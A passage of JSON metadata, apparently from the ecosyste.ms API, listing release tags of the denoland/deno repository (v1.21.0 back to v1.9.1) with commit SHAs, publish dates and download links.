/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20